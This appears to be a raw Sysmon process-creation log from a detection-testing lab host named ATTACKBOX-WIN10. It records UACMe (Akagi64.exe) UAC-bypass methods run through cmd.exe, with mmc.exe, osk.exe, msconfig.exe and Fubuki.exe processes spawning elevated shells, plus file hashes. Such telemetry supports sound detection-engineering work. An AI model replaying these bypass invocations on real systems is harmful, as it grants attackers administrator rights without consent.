(WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C7C2-6552-6103-000000001E00}2672C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exeATTACKBOX-WIN10\VICTIM 154100x8000000000000000682389Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:06.152{51A89197-C7C2-6552-6103-000000001E00}2672C:\Windows\System32\cmd.exe10.0.17134.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exeC:\Windows\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=3CE71813199ABAE99348F61F0CAA34E2574F831C,MD5=4E2ACF4F8A396486AB4268C94A6A245F,SHA256=9A7C58BD98D70631AA1473F7B57B426DB367D72429A5455B433A05EE251F3236,IMPHASH=8542FB14699D84D7E8DA92F66145C7FE{51A89197-C7C2-6552-6003-000000001E00}6008C:\Windows\System32\ComputerDefaults.exeC:\Windows\system32\computerdefaults.exeATTACKBOX-WIN10\VICTIM 154100x8000000000000000682383Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:06.144{51A89197-C7C2-6552-6003-000000001E00}6008C:\Windows\System32\ComputerDefaults.exe10.0.17134.1 (WinBuild.160101.0800)Set Program Access and Computer Defaults Control PanelMicrosoft® Windows® Operating SystemMicrosoft CorporationComputerDefaults.EXEC:\Windows\system32\computerdefaults.exeC:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=6ACA6C418777015ECD87287C1228084720B26AA4,MD5=1D494543B5C91E0EDD4C7C6C63EE25F0,SHA256=F2B961FC015180D8B4602EB4F4D22A6673AB6C3ED654C59E03F0AFBA1B68A2F5,IMPHASH=E4233225763223D3EDD7DFC3552572B3{51A89197-C7C1-6552-5D03-000000001E00}5140C:\DetectionTesting\Temp\ExternalPayloads\uacme\59 Akagi64.exe"C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\59 Akagi64.exe"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000682100Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:06.003{51A89197-C7C2-6552-5F03-000000001E00}6496C:\Windows\System32\consent.exe10.0.17134.677 (WinBuild.160101.0800)Consent UI for administrative applicationsMicrosoft® Windows® Operating SystemMicrosoft Corporationconsent.execonsent.exe 368 360 0000025DF26E2400C:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e71SystemSHA1=46776A2D63FF16E07EC79F666378F28F6FC770B6,MD5=9BF568CAC95DC11234078BA936B1DDFF,SHA256=CC48981C30BEE846DC04538A7F45D505C37F39F2384483D97E8D52B9D0E52C7D,IMPHASH=522D83761201075834F05037F5307949{51A89197-BE5A-6552-1300-000000001E00}368C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -pNT AUTHORITY\SYSTEM 154100x8000000000000000682091Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:05.984{51A89197-C7C1-6552-5E03-000000001E00}5968C:\Windows\System32\winver.exe10.0.17134.1 (WinBuild.160101.0800)Version Reporter AppletMicrosoft® Windows® Operating SystemMicrosoft CorporationWINVER.EXEC:\Windows\system32\winver.exeC:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=B918998D9C9CEEC44703A2282FA000FF75CBD65C,MD5=8A35F8B5BF9F88AAE14182F00DAC8234,SHA256=91D8984C81BDF8A31755EA7CE522F7507E41812D2A3E6429C82A7072514FD5F4,IMPHASH=92BE77A081419D46930EEB51BF20D61B{51A89197-C7C1-6552-5D03-000000001E00}5140C:\DetectionTesting\Temp\ExternalPayloads\uacme\59 Akagi64.exe"C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\59 Akagi64.exe"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000682042Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:05.857{51A89197-C7C1-6552-5D03-000000001E00}5140C:\DetectionTesting\Temp\ExternalPayloads\uacme\59 Akagi64.exe3.5.4.2012Pentesting utilityUACMeIntegrity Investment LLCAkagi.exe"C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\59 Akagi64.exe"C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=9DC297DCC8A35F1265E928640C018284DA945C90,MD5=89D5B518A790EC3B687F20BB41FF5DA6,SHA256=B5B0EB91BBF1E858F3B6A87EAF048BBE74EBE130C609DF693562E431A2DFE9A0,IMPHASH=49F99D1CD91BD039949B1E3472B20922{51A89197-C7C1-6552-5B03-000000001E00}8012C:\Windows\System32\cmd.exe"cmd.exe" /c "C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\59 Akagi64.exe"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000682010Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:05.791{51A89197-C7C1-6552-5C03-000000001E00}6408C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C7C1-6552-5B03-000000001E00}8012C:\Windows\System32\cmd.exe"cmd.exe" /c "C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\59 Akagi64.exe"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000682003Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:05.784{51A89197-C7C1-6552-5B03-000000001E00}8012C:\Windows\System32\cmd.exe10.0.17134.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"cmd.exe" /c "C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\59 Akagi64.exe"C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=3CE71813199ABAE99348F61F0CAA34E2574F831C,MD5=4E2ACF4F8A396486AB4268C94A6A245F,SHA256=9A7C58BD98D70631AA1473F7B57B426DB367D72429A5455B433A05EE251F3236,IMPHASH=8542FB14699D84D7E8DA92F66145C7FE{51A89197-C74B-6552-9C02-000000001E00}6296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000681965Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:05.543{51A89197-C7C1-6552-5A03-000000001E00}7424C:\Windows\System32\cmd.exe10.0.17134.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exeC:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=3CE71813199ABAE99348F61F0CAA34E2574F831C,MD5=4E2ACF4F8A396486AB4268C94A6A245F,SHA256=9A7C58BD98D70631AA1473F7B57B426DB367D72429A5455B433A05EE251F3236,IMPHASH=8542FB14699D84D7E8DA92F66145C7FE{51A89197-C7C0-6552-5803-000000001E00}4104C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000681839Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:04.591{51A89197-C7C0-6552-5903-000000001E00}6616C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C7C0-6552-5803-000000001E00}4104C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000681832Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:04.582{51A89197-C7C0-6552-5803-000000001E00}4104C:\Windows\System32\cmd.exe10.0.17134.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\System32\cmd.exe" C:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=3CE71813199ABAE99348F61F0CAA34E2574F831C,MD5=4E2ACF4F8A396486AB4268C94A6A245F,SHA256=9A7C58BD98D70631AA1473F7B57B426DB367D72429A5455B433A05EE251F3236,IMPHASH=8542FB14699D84D7E8DA92F66145C7FE{51A89197-C7BF-6552-5703-000000001E00}1616C:\Windows\System32\msconfig.exe"C:\Windows\system32\msconfig.exe" -5ATTACKBOX-WIN10\VICTIM 154100x8000000000000000681684Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:03.449{51A89197-C7BF-6552-5703-000000001E00}1616C:\Windows\System32\msconfig.exe10.0.17134.1 (WinBuild.160101.0800)System Configuration UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationmsconfig.EXE"C:\Windows\system32\msconfig.exe" -5C:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=E8FFF9E605F287BFF3110A777DAF66B11C48E1BE,MD5=75753F256D22B6DC6BCEC1528E8C87C1,SHA256=12DA9E2CD5E7CAC990EA2C2E0A0FFE9D4A963CCD05986330D7DC57E68C19374E,IMPHASH=B9ED4A93C60CF189167E373CF6AFD577{51A89197-C7BF-6552-5203-000000001E00}5524C:\Users\VICTIM\AppData\Local\Temp\Fubuki.exeC:\Windows\system32\cmd.exeATTACKBOX-WIN10\VICTIM 154100x8000000000000000681655Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:03.386{51A89197-C7BF-6552-5603-000000001E00}5660C:\Windows\System32\dllhost.exe10.0.17134.1 (WinBuild.160101.0800)COM SurrogateMicrosoft® Windows® Operating SystemMicrosoft Corporationdllhost.exeC:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}C:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e70SystemSHA1=257815EF5AC9E0408D327C5D1627D4C3795FF341,MD5=2528137C6745C4EADD87817A1909677E,SHA256=204FD3DA29E9197A7E82AB628E017A74082934E87092AFE18D253446608E0971,IMPHASH=68E651F131674892AE7E46556EB24726{51A89197-BE59-6552-0F00-000000001E00}756C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -pNT AUTHORITY\SYSTEM 154100x8000000000000000681612Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:03.314{51A89197-C7BF-6552-5503-000000001E00}508C:\Windows\System32\dllhost.exe10.0.17134.1 (WinBuild.160101.0800)COM SurrogateMicrosoft® Windows® Operating SystemMicrosoft Corporationdllhost.exeC:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}C:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e71SystemSHA1=257815EF5AC9E0408D327C5D1627D4C3795FF341,MD5=2528137C6745C4EADD87817A1909677E,SHA256=204FD3DA29E9197A7E82AB628E017A74082934E87092AFE18D253446608E0971,IMPHASH=68E651F131674892AE7E46556EB24726{51A89197-BE59-6552-0F00-000000001E00}756C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -pNT AUTHORITY\SYSTEM 154100x8000000000000000681369Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:03.183{51A89197-C7BF-6552-5403-000000001E00}1904C:\Windows\System32\consent.exe10.0.17134.677 (WinBuild.160101.0800)Consent UI for administrative applicationsMicrosoft® Windows® Operating SystemMicrosoft Corporationconsent.execonsent.exe 368 322 0000025DF37D7600C:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e71SystemSHA1=46776A2D63FF16E07EC79F666378F28F6FC770B6,MD5=9BF568CAC95DC11234078BA936B1DDFF,SHA256=CC48981C30BEE846DC04538A7F45D505C37F39F2384483D97E8D52B9D0E52C7D,IMPHASH=522D83761201075834F05037F5307949{51A89197-BE5A-6552-1300-000000001E00}368C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -pNT AUTHORITY\SYSTEM 154100x8000000000000000681336Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:03.149{51A89197-C7BF-6552-5303-000000001E00}4332C:\Windows\System32\msconfig.exe10.0.17134.1 (WinBuild.160101.0800)System Configuration UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationmsconfig.EXE"C:\Windows\system32\msconfig.exe" -5C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=E8FFF9E605F287BFF3110A777DAF66B11C48E1BE,MD5=75753F256D22B6DC6BCEC1528E8C87C1,SHA256=12DA9E2CD5E7CAC990EA2C2E0A0FFE9D4A963CCD05986330D7DC57E68C19374E,IMPHASH=B9ED4A93C60CF189167E373CF6AFD577{51A89197-C7BF-6552-5203-000000001E00}5524C:\Users\VICTIM\AppData\Local\Temp\Fubuki.exeC:\Windows\system32\cmd.exeATTACKBOX-WIN10\VICTIM 154100x8000000000000000681276Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:03.023{51A89197-C7BF-6552-5203-000000001E00}5524C:\Users\VICTIM\AppData\Local\Temp\Fubuki.exe3.2.7.2009UACMe proxy DLLUACMeHazardous EnvironmentsFubuki.dllC:\Windows\system32\cmd.exeC:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=1E23B9CA65D71EAAB996A39FCB56B71A3FDE7916,MD5=FC76F6830FBCE341E549994DC1EDC47B,SHA256=ECF8C3C8F85B39A03250BF0D8EB022159397C7EE4752019FD1F60B94164305BF,IMPHASH=069E5461D2FBAD8D4C3909C4E0340847{51A89197-C7BE-6552-4E03-000000001E00}7864C:\DetectionTesting\Temp\ExternalPayloads\uacme\56 Akagi64.exe"C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\56 Akagi64.exe"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000681269Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:03.012{51A89197-C7BF-6552-5103-000000001E00}5704C:\Windows\System32\osk.exe10.0.17134.376 (WinBuild.160101.0800)Accessibility On-Screen KeyboardMicrosoft® Windows® Operating SystemMicrosoft Corporationosk.exe"C:\Windows\system32\osk.exe" C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961HighSHA1=05039ED9DBFB513A18649D946FEA67EC1715DF58,MD5=FAF01C3C0E977AA81B925B1B81C8919B,SHA256=F855FFB4F49EFE66EFCDF28E0710637FE34E7A89E38A9493C88153220CD873AD,IMPHASH=701A7B99D329B6D4E6B9C4CB9292D8A5{51A89197-C7BE-6552-4E03-000000001E00}7864C:\DetectionTesting\Temp\ExternalPayloads\uacme\56 Akagi64.exe"C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\56 Akagi64.exe"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000681027Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:02.848{51A89197-C7BE-6552-5003-000000001E00}5796C:\Windows\System32\consent.exe10.0.17134.677 (WinBuild.160101.0800)Consent UI for administrative applicationsMicrosoft® Windows® Operating SystemMicrosoft Corporationconsent.execonsent.exe 368 288 0000025DF1FE8040C:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e71SystemSHA1=46776A2D63FF16E07EC79F666378F28F6FC770B6,MD5=9BF568CAC95DC11234078BA936B1DDFF,SHA256=CC48981C30BEE846DC04538A7F45D505C37F39F2384483D97E8D52B9D0E52C7D,IMPHASH=522D83761201075834F05037F5307949{51A89197-BE5A-6552-1300-000000001E00}368C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -pNT AUTHORITY\SYSTEM 154100x8000000000000000681020Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:02.813{51A89197-C7BE-6552-4F03-000000001E00}3720C:\Windows\System32\osk.exe10.0.17134.376 (WinBuild.160101.0800)Accessibility On-Screen KeyboardMicrosoft® Windows® Operating SystemMicrosoft Corporationosk.exe"C:\Windows\system32\osk.exe" C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=05039ED9DBFB513A18649D946FEA67EC1715DF58,MD5=FAF01C3C0E977AA81B925B1B81C8919B,SHA256=F855FFB4F49EFE66EFCDF28E0710637FE34E7A89E38A9493C88153220CD873AD,IMPHASH=701A7B99D329B6D4E6B9C4CB9292D8A5{51A89197-C7BE-6552-4E03-000000001E00}7864C:\DetectionTesting\Temp\ExternalPayloads\uacme\56 Akagi64.exe"C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\56 Akagi64.exe"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000680904Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:02.282{51A89197-C7BE-6552-4E03-000000001E00}7864C:\DetectionTesting\Temp\ExternalPayloads\uacme\56 Akagi64.exe3.2.7.2009UACMe main moduleUACMeHazardous EnvironmentsAkagi.exe"C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\56 Akagi64.exe"C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=44E57A07C951D4449214E1992BCD3098625436A1,MD5=28C77E9A44630FF42EBE8C4068B5E42C,SHA256=E6BC9A37CE3F74393F6B1E85134C021B777E0D6A4F947410D23FE343CF7A9C97,IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38{51A89197-C7BE-6552-4C03-000000001E00}708C:\Windows\System32\cmd.exe"cmd.exe" /c "C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\56 Akagi64.exe"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000680872Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:02.213{51A89197-C7BE-6552-4D03-000000001E00}5800C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C7BE-6552-4C03-000000001E00}708C:\Windows\System32\cmd.exe"cmd.exe" /c "C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\56 Akagi64.exe"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000680865Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:02.201{51A89197-C7BE-6552-4C03-000000001E00}708C:\Windows\System32\cmd.exe10.0.17134.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"cmd.exe" /c "C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\56 Akagi64.exe"C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=3CE71813199ABAE99348F61F0CAA34E2574F831C,MD5=4E2ACF4F8A396486AB4268C94A6A245F,SHA256=9A7C58BD98D70631AA1473F7B57B426DB367D72429A5455B433A05EE251F3236,IMPHASH=8542FB14699D84D7E8DA92F66145C7FE{51A89197-C74B-6552-9C02-000000001E00}6296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000680643Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:58.095{51A89197-C7BA-6552-4B03-000000001E00}4164C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C7BA-6552-4A03-000000001E00}4168C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000680636Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:58.076{51A89197-C7BA-6552-4A03-000000001E00}4168C:\Windows\System32\cmd.exe10.0.17134.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe"C:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=3CE71813199ABAE99348F61F0CAA34E2574F831C,MD5=4E2ACF4F8A396486AB4268C94A6A245F,SHA256=9A7C58BD98D70631AA1473F7B57B426DB367D72429A5455B433A05EE251F3236,IMPHASH=8542FB14699D84D7E8DA92F66145C7FE{51A89197-C7BA-6552-4903-000000001E00}2508C:\Windows\System32\mmc.exehuy32,wf.msc "C:\Users\VICTIM\AppData\Local\Temp\kmkze.msc"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000680590Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:58.006{51A89197-C7BA-6552-4903-000000001E00}2508C:\Windows\System32\mmc.exe10.0.17134.1 (WinBuild.160101.0800)Microsoft Management ConsoleMicrosoft® Windows® Operating SystemMicrosoft Corporationmmc.exehuy32,wf.msc "C:\Users\VICTIM\AppData\Local\Temp\kmkze.msc"C:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=382008FBA9480F6568DB3E1F335D080192DE62CA,MD5=BA80301974CC8C4FB9F3F9DDB5905C30,SHA256=683C0CB518B3FE31CFFA7FCF79F5EFC18D355C6D52734757758ED26AE5950037,IMPHASH=A4839A4F4C2BB2C12AA47ACB52D27833{51A89197-C7B9-6552-4703-000000001E00}5608C:\DetectionTesting\Temp\ExternalPayloads\uacme\39 Akagi64.exe"C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\39 Akagi64.exe"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000680304Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:57.805{51A89197-C7B9-6552-4803-000000001E00}7812C:\Windows\System32\consent.exe10.0.17134.677 (WinBuild.160101.0800)Consent UI for administrative applicationsMicrosoft® Windows® Operating SystemMicrosoft Corporationconsent.execonsent.exe 368 400 0000025DF47D04A0C:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e71SystemSHA1=46776A2D63FF16E07EC79F666378F28F6FC770B6,MD5=9BF568CAC95DC11234078BA936B1DDFF,SHA256=CC48981C30BEE846DC04538A7F45D505C37F39F2384483D97E8D52B9D0E52C7D,IMPHASH=522D83761201075834F05037F5307949{51A89197-BE5A-6552-1300-000000001E00}368C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -pNT AUTHORITY\SYSTEM 154100x8000000000000000680055Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:57.216{51A89197-C7B9-6552-4703-000000001E00}5608C:\DetectionTesting\Temp\ExternalPayloads\uacme\39 Akagi64.exe3.2.7.2009UACMe main moduleUACMeHazardous EnvironmentsAkagi.exe"C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\39 Akagi64.exe"C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=1B1A4DC7C2D51613F4C53906F5B27F7517FDB86F,MD5=26925E1EE4A8A7C0F91FA8BDB3CEA538,SHA256=8C3726E0F88A66E2E8844F4318EC0E4E46C1589EF50733E683E3050685BA3FDA,IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38{51A89197-C7B9-6552-4503-000000001E00}5668C:\Windows\System32\cmd.exe"cmd.exe" /c "C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\39 Akagi64.exe"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000680021Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:57.147{51A89197-C7B9-6552-4603-000000001E00}2860C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C7B9-6552-4503-000000001E00}5668C:\Windows\System32\cmd.exe"cmd.exe" /c "C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\39 Akagi64.exe"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000680014Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:57.139{51A89197-C7B9-6552-4503-000000001E00}5668C:\Windows\System32\cmd.exe10.0.17134.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"cmd.exe" /c "C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\39 Akagi64.exe"C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=3CE71813199ABAE99348F61F0CAA34E2574F831C,MD5=4E2ACF4F8A396486AB4268C94A6A245F,SHA256=9A7C58BD98D70631AA1473F7B57B426DB367D72429A5455B433A05EE251F3236,IMPHASH=8542FB14699D84D7E8DA92F66145C7FE{51A89197-C74B-6552-9C02-000000001E00}6296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000679841Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:56.512{51A89197-C7B8-6552-4403-000000001E00}5544C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff 